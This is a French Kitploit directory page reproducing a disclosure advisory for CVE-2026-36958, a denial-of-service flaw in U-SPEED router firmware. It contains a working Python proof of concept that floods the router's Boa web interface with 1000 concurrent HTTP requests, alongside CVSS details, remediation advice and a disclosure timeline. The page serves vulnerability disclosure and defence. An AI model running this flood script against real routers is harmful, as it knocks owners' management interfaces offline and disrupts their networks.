Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-36958 — Preuve de concept pour CVE-2026-36958, une vulnérabilité de déni de service dans le firmware du routeur U-SPEED qui épuise les ressources via des requêtes HTTP concurrentes, rendant l'interface web non réactive. | Kitploit
Outils/GitHubGitHub/kirubel-cve/cve-2026-36958
Analyse des VulnérabilitésExploitationSécurité WebSécurité RéseauTests d'Intrusion
GitHubkirubel-cve/cve-2026-36958

CVE-2026-36958

Preuve de concept pour CVE-2026-36958, une vulnérabilité de déni de service dans le firmware du routeur U-SPEED qui épuise les ressources via des requêtes HTTP concurrentes, rendant l'interface web non réactive.

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-36958 : Déni de service via des requêtes HTTP concurrentes

ID CVE : CVE-2026-36958 Date : 2026-04-29 Découvreur : Kirubel Solomne Fournisseur : U-SPEED Produit : Routeur U-SPEED Version du firmware : V1.0.0 CWE : CWE-400 - Consommation de ressources incontrôlée


Description

Le firmware V1.0.0 du routeur U-SPEED est vulnérable à un déni de service. En envoyant un grand nombre de requêtes HTTP concurrentes vers des points de terminaison aléatoires ou inexistants de l'interface de gestion web, un attaquant peut épuiser les ressources système du serveur HTTP Boa intégré. Cela rend l'interface web du routeur non réactive et peut nécessiter un redémarrage manuel pour rétablir un fonctionnement normal.


Score CVSS

Score CVSS v3.1 : 7,5 (Élevé) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

MétriqueValeur
Vecteur d'attaqueRéseau
Complexité de l'attaqueFaible
Privilèges requisAucun
Interaction de l'utilisateurAucune
Impact sur la confidentialitéAucun
Impact sur l'intégritéAucun
Impact sur la disponibilitéÉlevé

Preuve de concept

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router web interface is still responsive.")

Comportement attendu : Le serveur doit gérer les connexions concurrentes avec élégance. Comportement réel : L'interface web devient non réactive ; un redémarrage manuel est nécessaire.


Impact

  • L'interface de gestion web devient indisponible
  • Perturbation potentielle des services de routage
  • Nécessite un redémarrage manuel pour restaurer les fonctionnalités

Remédiation

  • Mettre en œuvre une limitation du débit de connexions sur le serveur web Boa
  • Limiter le nombre maximal de connexions concurrentes par adresse IP source
  • Ajouter un mécanisme de récupération automatique/chien de garde

Chronologie de divulgation

DateÉvénement
2026-04-29Vulnérabilité découverte
2026-04-29Signalée à MITRE
2026-04-29CVE-2026-36958 attribuée
2026-04-29Divulgation publique

Références

  • MITRE CVE-2026-36958
  • CWE-400
  • Site web du fournisseur
Télécharger l’outil